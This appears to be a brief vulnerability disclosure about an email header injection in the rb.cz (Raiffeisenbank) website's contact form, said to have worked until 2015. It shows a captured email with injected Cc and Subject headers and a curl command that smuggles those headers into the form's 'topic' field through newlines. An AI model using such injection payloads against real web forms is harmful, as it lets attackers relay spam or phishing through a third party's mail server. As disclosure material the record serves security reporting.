rb.cz email injection (working until new website got deployed 2015-04-02, vulnerable since 2011 at least, reported at least in 2013, 2014)

rbcz-email-injection.msg

Received: (qmail 23343 invoked by uid 1013); 31 Oct 2013 16:45:31 -0000
Received: from no-reply@rb.cz by smtp by uid 0 with qmail-scanner-1.22 
 ( Clear:RC:0(62.168.6.253):. 
 Processed in 0.011431 secs); 31 Oct 2013 16:45:31 -0000
Received: from smtp2.rb.cz (62.168.6.253)
  by smtp.example.com with SMTP; 31 Oct 2013 16:45:31 -0000
Received: from sv72-wwwjbo2-al-02 (unknown [172.18.8.181])
        by smtp2.rb.cz (Postfix) with ESMTP id 2AF4D18038D
        for <spam@example.com>; Thu, 31 Oct 2013 17:45:31 +0100 (CET)
From: no-reply@rb.cz
To: spam@example.com
Message-ID: <10904531.1051383237931149.JavaMail.jboss@172.18.0.139>
Subject: Email z formulare "Kontaktujte nas - lide" - foo
CC: spam@example.net
Subject: waldo

BODY

-----
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: quoted-printable

=C3=9Adaje vypln=C4=9Bn=C3=A9 a odeslan=C3=A9 klientem z webov=C3=A9ho form=
ul=C3=A1=C5=99e.

Jm=C3=A9no a p=C5=99=C3=ADjmen=C3=AD: foo bar
Telefon:=20
E-mail: foo@example.com
T=C3=A9ma: foo

BODY

-----
Kontaktn=C3=AD pobo=C4=8Dka:=20

V=C3=A1=C5=A1 dotaz:

rbcz-email-injection.sh

curl "http://www.rb.cz/views/pages/send-mail-contact-us/" \
--form "to=spam@example.com" \
--form "topic=foo
Cc:spam@example.net
Subject: waldo

BODY

-----" \